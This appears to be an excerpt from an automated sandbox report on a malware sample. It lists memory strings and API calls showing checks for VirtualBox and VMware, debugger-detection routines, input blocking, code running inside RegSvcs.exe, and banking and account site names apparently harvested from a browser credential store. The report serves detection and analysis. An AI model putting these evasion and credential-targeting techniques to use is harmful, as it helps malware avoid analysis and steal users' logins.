Source: bpqdpksed.icm, 00000008.00000003.2281306225.0000000001864000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000002.2403369115.0000000001878000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402357994.0000000001878000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2401436869.0000000001877000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2281363015.0000000001875000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If ProcessExists("VBoxTray.exe") Then
            Source: vbepwhj.mp3.8.dr, vbepwhj.mp3.0.drBinary or memory string: If ProcessExists("VBoxTray.exe") Then
            Source: 7kHDEL15.22.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: bpqdpksed.icm, 00000008.00000003.2281363015.0000000001875000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
            Source: bpqdpksed.icm, 00000008.00000003.2401256601.000000000187D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rocessExists("VboxService.exe") Then
            Source: 7kHDEL15.22.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 7kHDEL15.22.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: bpqdpksed.icm, 00000008.00000002.2403293170.0000000001848000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then7i
            Source: bpqdpksed.icm, 00000008.00000003.2401579053.00000000018C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.execroso
            Source: 7kHDEL15.22.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: 7kHDEL15.22.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: bpqdpksed.icm, 00000008.00000003.2401579053.00000000018C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exeyS
            Source: vbepwhj.mp3.0.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
            Source: EhStorAuthn.exe, 00000016.00000002.3355997152.000000000286A000.00000004.00000020.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3355893748.000000000088F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 7kHDEL15.22.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: 7kHDEL15.22.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: bpqdpksed.icm, 00000008.00000003.2401256601.000000000187D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
            Source: EhStorAuthn.exe, 00000016.00000002.3361591010.00000000076F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tion PasswordVMware20,11696487552}
            Source: 7kHDEL15.22.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 7kHDEL15.22.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 7kHDEL15.22.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 7kHDEL15.22.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 7kHDEL15.22.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 7kHDEL15.22.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: bpqdpksed.icm, 00000008.00000003.2401579053.00000000018C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe/n
            Source: 7kHDEL15.22.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 7kHDEL15.22.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 7kHDEL15.22.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: 7kHDEL15.22.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 7kHDEL15.22.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeAPI call chain: ExitProcess graph end nodegraph_0-30469
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0142096E rdtsc 15_2_0142096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_004174F3 LdrLoadDll,15_2_004174F3
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DDF3FF BlockInput,8_2_00DDF3FF
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E86878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E86878
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D65D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,8_2_00D65D78
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E8ECAA mov eax, dword ptr fs:[00000030h]0_2_00E8ECAA
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D85078 mov eax, dword ptr fs:[00000030h]8_2_00D85078
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01474144 mov eax, dword ptr fs:[00000030h]15_2_01474144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01474144 mov eax, dword ptr fs:[00000030h]15_2_01474144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01474144 mov ecx, dword ptr fs:[00000030h]15_2_01474144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01474144 mov eax, dword ptr fs:[00000030h]15_2_01474144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01474144 mov eax, dword ptr fs:[00000030h]15_2_01474144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01478158 mov eax, dword ptr fs:[00000030h]15_2_01478158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B4164 mov eax, dword ptr fs:[00000030h]15_2_014B4164
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B4164 mov eax, dword ptr fs:[00000030h]15_2_014B4164
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E10E mov eax, dword ptr fs:[00000030h]15_2_0148E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E10E mov ecx, dword ptr fs:[00000030h]15_2_0148E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E10E mov eax, dword ptr fs:[00000030h]15_2_0148E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E10E mov eax, dword ptr fs:[00000030h]15_2_0148E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E10E mov ecx, dword ptr fs:[00000030h]15_2_0148E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E10E mov eax, dword ptr fs:[00000030h]15_2_0148E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E10E mov eax, dword ptr fs:[00000030h]15_2_0148E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E10E mov ecx, dword ptr fs:[00000030h]15_2_0148E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E10E mov eax, dword ptr fs:[00000030h]15_2_0148E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E10E mov ecx, dword ptr fs:[00000030h]15_2_0148E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148A118 mov ecx, dword ptr fs:[00000030h]15_2_0148A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148A118 mov eax, dword ptr fs:[00000030h]15_2_0148A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148A118 mov eax, dword ptr fs:[00000030h]15_2_0148A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148A118 mov eax, dword ptr fs:[00000030h]15_2_0148A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A0115 mov eax, dword ptr fs:[00000030h]15_2_014A0115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01410124 mov eax, dword ptr fs:[00000030h]15_2_01410124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E6154 mov eax, dword ptr fs:[00000030h]15_2_013E6154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E6154 mov eax, dword ptr fs:[00000030h]15_2_013E6154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DC156 mov eax, dword ptr fs:[00000030h]15_2_013DC156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A61C3 mov eax, dword ptr fs:[00000030h]15_2_014A61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A61C3 mov eax, dword ptr fs:[00000030h]15_2_014A61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145E1D0 mov eax, dword ptr fs:[00000030h]15_2_0145E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145E1D0 mov eax, dword ptr fs:[00000030h]15_2_0145E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145E1D0 mov ecx, dword ptr fs:[00000030h]15_2_0145E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145E1D0 mov eax, dword ptr fs:[00000030h]15_2_0145E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145E1D0 mov eax, dword ptr fs:[00000030h]15_2_0145E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DA197 mov eax, dword ptr fs:[00000030h]15_2_013DA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DA197 mov eax, dword ptr fs:[00000030h]15_2_013DA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DA197 mov eax, dword ptr fs:[00000030h]15_2_013DA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B61E5 mov eax, dword ptr fs:[00000030h]15_2_014B61E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014101F8 mov eax, dword ptr fs:[00000030h]15_2_014101F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0149C188 mov eax, dword ptr fs:[00000030h]15_2_0149C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0149C188 mov eax, dword ptr fs:[00000030h]15_2_0149C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01420185 mov eax, dword ptr fs:[00000030h]15_2_01420185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01484180 mov eax, dword ptr fs:[00000030h]15_2_01484180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01484180 mov eax, dword ptr fs:[00000030h]15_2_01484180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146019F mov eax, dword ptr fs:[00000030h]15_2_0146019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146019F mov eax, dword ptr fs:[00000030h]15_2_0146019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146019F mov eax, dword ptr fs:[00000030h]15_2_0146019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146019F mov eax, dword ptr fs:[00000030h]15_2_0146019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01466050 mov eax, dword ptr fs:[00000030h]15_2_01466050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DA020 mov eax, dword ptr fs:[00000030h]15_2_013DA020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DC020 mov eax, dword ptr fs:[00000030h]15_2_013DC020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013FE016 mov eax, dword ptr fs:[00000030h]15_2_013FE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013FE016 mov eax, dword ptr fs:[00000030h]15_2_013FE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013FE016 mov eax, dword ptr fs:[00000030h]15_2_013FE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013FE016 mov eax, dword ptr fs:[00000030h]15_2_013FE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140C073 mov eax, dword ptr fs:[00000030h]15_2_0140C073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01464000 mov ecx, dword ptr fs:[00000030h]15_2_01464000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01482000 mov eax, dword ptr fs:[00000030h]15_2_01482000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01482000 mov eax, dword ptr fs:[00000030h]15_2_01482000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01482000 mov eax, dword ptr fs:[00000030h]15_2_01482000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01482000 mov eax, dword ptr fs:[00000030h]15_2_01482000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01482000 mov eax, dword ptr fs:[00000030h]15_2_01482000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01482000 mov eax, dword ptr fs:[00000030h]15_2_01482000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01482000 mov eax, dword ptr fs:[00000030h]15_2_01482000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01482000 mov eax, dword ptr fs:[00000030h]15_2_01482000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E2050 mov eax, dword ptr fs:[00000030h]15_2_013E2050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01476030 mov eax, dword ptr fs:[00000030h]15_2_01476030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014620DE mov eax, dword ptr fs:[00000030h]15_2_014620DE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013D80A0 mov eax, dword ptr fs:[00000030h]15_2_013D80A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014660E0 mov eax, dword ptr fs:[00000030h]15_2_014660E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014220F0 mov ecx, dword ptr fs:[00000030h]15_2_014220F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E208A mov eax, dword ptr fs:[00000030h]15_2_013E208A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DC0F0 mov eax, dword ptr fs:[00000030h]15_2_013DC0F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E80E9 mov eax, dword ptr fs:[00000030h]15_2_013E80E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DA0E3 mov ecx, dword ptr fs:[00000030h]15_2_013DA0E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014780A8 mov eax, dword ptr fs:[00000030h]15_2_014780A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A60B8 mov eax, dword ptr fs:[00000030h]15_2_014A60B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A60B8 mov ecx, dword ptr fs:[00000030h]15_2_014A60B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B634F mov eax, dword ptr fs:[00000030h]15_2_014B634F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014AA352 mov eax, dword ptr fs:[00000030h]15_2_014AA352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01488350 mov ecx, dword ptr fs:[00000030h]15_2_01488350
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146035C mov eax, dword ptr fs:[00000030h]15_2_0146035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146035C mov eax, dword ptr fs:[00000030h]15_2_0146035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146035C mov eax, dword ptr fs:[00000030h]15_2_0146035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146035C mov ecx, dword ptr fs:[00000030h]15_2_0146035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146035C mov eax, dword ptr fs:[00000030h]15_2_0146035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146035C mov eax, dword ptr fs:[00000030h]15_2_0146035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DC310 mov ecx, dword ptr fs:[00000030h]15_2_013DC310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148437C mov eax, dword ptr fs:[00000030h]15_2_0148437C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141A30B mov eax, dword ptr fs:[00000030h]15_2_0141A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141A30B mov eax, dword ptr fs:[00000030h]15_2_0141A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141A30B mov eax, dword ptr fs:[00000030h]15_2_0141A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01400310 mov ecx, dword ptr fs:[00000030h]15_2_01400310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B8324 mov eax, dword ptr fs:[00000030h]15_2_014B8324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B8324 mov ecx, dword ptr fs:[00000030h]15_2_014B8324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B8324 mov eax, dword ptr fs:[00000030h]15_2_014B8324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B8324 mov eax, dword ptr fs:[00000030h]15_2_014B8324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0149C3CD mov eax, dword ptr fs:[00000030h]15_2_0149C3CD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014663C0 mov eax, dword ptr fs:[00000030h]15_2_014663C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E3DB mov eax, dword ptr fs:[00000030h]15_2_0148E3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E3DB mov eax, dword ptr fs:[00000030h]15_2_0148E3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E3DB mov ecx, dword ptr fs:[00000030h]15_2_0148E3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E3DB mov eax, dword ptr fs:[00000030h]15_2_0148E3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014843D4 mov eax, dword ptr fs:[00000030h]15_2_014843D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014843D4 mov eax, dword ptr fs:[00000030h]15_2_014843D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013D8397 mov eax, dword ptr fs:[00000030h]15_2_013D8397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013D8397 mov eax, dword ptr fs:[00000030h]15_2_013D8397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013D8397 mov eax, dword ptr fs:[00000030h]15_2_013D8397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DE388 mov eax, dword ptr fs:[00000030h]15_2_013DE388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DE388 mov eax, dword ptr fs:[00000030h]15_2_013DE388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DE388 mov eax, dword ptr fs:[00000030h]15_2_013DE388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014163FF mov eax, dword ptr fs:[00000030h]15_2_014163FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013FE3F0 mov eax, dword ptr fs:[00000030h]15_2_013FE3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013FE3F0 mov eax, dword ptr fs:[00000030h]15_2_013FE3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013FE3F0 mov eax, dword ptr fs:[00000030h]15_2_013FE3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140438F mov eax, dword ptr fs:[00000030h]15_2_0140438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140438F mov eax, dword ptr fs:[00000030h]15_2_0140438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F03E9 mov eax, dword ptr fs:[00000030h]15_2_013F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F03E9 mov eax, dword ptr fs:[00000030h]15_2_013F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F03E9 mov eax, dword ptr fs:[00000030h]15_2_013F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F03E9 mov eax, dword ptr fs:[00000030h]15_2_013F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F03E9 mov eax, dword ptr fs:[00000030h]15_2_013F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F03E9 mov eax, dword ptr fs:[00000030h]15_2_013F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F03E9 mov eax, dword ptr fs:[00000030h]15_2_013F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F03E9 mov eax, dword ptr fs:[00000030h]15_2_013F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA3C0 mov eax, dword ptr fs:[00000030h]15_2_013EA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA3C0 mov eax, dword ptr fs:[00000030h]15_2_013EA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA3C0 mov eax, dword ptr fs:[00000030h]15_2_013EA3C0
